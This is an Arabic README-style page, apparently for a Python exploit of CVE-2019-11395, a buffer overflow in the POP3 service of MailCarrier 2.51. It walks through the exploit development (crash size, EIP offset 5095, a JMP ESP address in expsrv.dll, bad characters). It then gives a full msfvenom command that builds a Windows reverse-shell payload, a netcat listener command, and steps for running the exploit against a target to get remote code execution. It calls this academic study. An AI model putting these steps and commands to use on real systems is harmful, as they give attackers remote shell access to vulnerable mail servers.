
استغلال بلغة Python لـ CVE-2019-11395، تجاوز سعة المخزن المؤقت في خدمة POP3 لـ MailCarrier 2.51. يولد حمولة قشرة عكسية عبر msfvenom ويحقق تنفيذ التعليمات البرمجية عن بُعد على أهداف Windows.
تصف ثغرة CVE-2019-11395 ثغرة تجاوز سعة المخزن المؤقت في تطبيق البريد الإلكتروني MailCarrier 2.51، مما يسمح بتنفيذ التعليمات البرمجية عن بُعد. تحدث الثغرة في عمليات SMTP RCPT TO، POP3 USER، POP3 LIST، POP3 TOP، أو POP3 RETR.
خلال الدراسة الأكاديمية، تم التركيز على عمليات POP3 لإنشاء إثبات المفهوم (PoC). تم تحديد أن إرسال 6000 بايت إلى التطبيق يتسبب في توقف عمله، مما يكشف عن ثغرة تجاوز سعة المخزن المؤقت.
msf-pattern_create -l 6000 لتحديد EIP بدقة.msf-pattern_offset -q 6E47386E -l 6000، مما أدى إلى إزاحة EIP بقيمة 5095.expsrv.dll مع تعطيل ASLR، مناسب لـ JMP ESP.\x00\x0a\x0d أثناء اختبارات الأحرف غير الصالحة.msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=4444 exitfunc=thread -f python -b "\x00\x0a\x0d" -v shellcode.CVE-2019-11395.py لتلائم الحمولة.nc -lnvp 4444 وتنفيذ الاستغلال (CVE-2019-11395.py) للوصول إلى البيئة والتحقق من CVE الموصوفة.اتبع هذه الخطوات لاستخدام الاستغلال:
msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=4444 exitfunc=thread -f python -b "\x00\x0a\x0d" -v shellcode.msfvenom.CVE-2019-11395.py لاستبدال متغير shellcode بالناتج الذي حصلت عليه من أمر msfvenom.CVE-2019-11395.py) للوصول إلى البيئة والتحقق من CVE الموصوفة.
قم بزيارة صفحتي على LinkedIn